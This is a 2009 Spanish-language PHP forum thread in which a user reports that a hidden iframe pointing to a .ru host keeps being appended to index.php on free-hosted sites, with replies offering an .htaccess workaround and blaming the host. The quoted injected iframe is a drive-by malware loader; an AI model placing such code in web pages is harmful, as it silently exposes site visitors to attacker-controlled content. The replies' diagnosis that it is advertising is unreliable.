Foros del Web » Programando para Internet » PHP »

Problema con PHP

Estas en el tema de Problema con PHP en el foro de PHP en Foros del Web. Hola, tengo un problema con PHP. Tengo hosteadas unas webs en 000webhost.com y estas tienen error con PHP. Lo que sucede es que los index.php ...
  #1 (permalink)  
Antiguo 27/07/2009, 21:35
 
Fecha de Ingreso: junio-2009
Mensajes: 8
Antigüedad: 14 años, 10 meses
Puntos: 0
Problema con PHP

Hola, tengo un problema con PHP. Tengo hosteadas unas webs en 000webhost.com y estas tienen error con PHP. Lo que sucede es que los index.php son modificados.

Se agrega esto:

Código PHP:
<iframe src="http : // q5c.ru:8080/index.php" width=198 height=176 style="visibility: hidden"></iframe
Se agrega eso al final del archivo. Yo lo que hago es corregir el archivo index.php y ahi puedo entrar a las webs. Pero luego vuelve a aparecer ese codigo (aproximadamente en unas 2 horas o hasta 1 dia vuelve a aparecer ese codigo)

No se como solucionarlo gracias
  #2 (permalink)  
Antiguo 27/07/2009, 21:56
 
Fecha de Ingreso: enero-2009
Mensajes: 408
Antigüedad: 15 años, 3 meses
Puntos: 14
Respuesta: Problema con PHP

Hola ,te deja subir ficheros .htaccess? si es asi puedes crear un fichero como lo siguiente:

Código htaccess:
Ver original
  1. RewriteEngine On
  2.  
  3. RewriteBase /
  4.  
  5. RewriteRule ^index.php$ index2.php?%{QUERY_STRING} [L,NC]

es decir redireccionas todo el flujo que va al index.php al index2.php , de ese modo te saltas ese problema que decis , va eso creo yo , lo saltas siempre y cuando solo modifique el index ,de lo contrario no tendras escapatoria ya que ellos publicitan para poder ganar dinero y mantener el servicio gratis.

Fijate este link: http://jonatanlc.hostzi.com/index.php?auto=azul , lo hice yo con este codigo que te diseñe acá , en realidad no navegas el index.php navegas ejemploWeb.php en mi caso :) , al intentar modificar el index.php no existe por lo tanto no creo que tengas problema , de todas maneras si salta algun nuevo problemita avisa.

Saludos

Última edición por jonatanc; 27/07/2009 a las 22:12 Razón: modificación en htaccess
  #3 (permalink)  
Antiguo 27/07/2009, 22:12
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 18 años
Puntos: 2135
Respuesta: Problema con PHP

En ese caso no creo que sea problema en sí de PHP o de tu código si no de la web donde tienes hospedados tus archivos.

Saludos.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 09:52.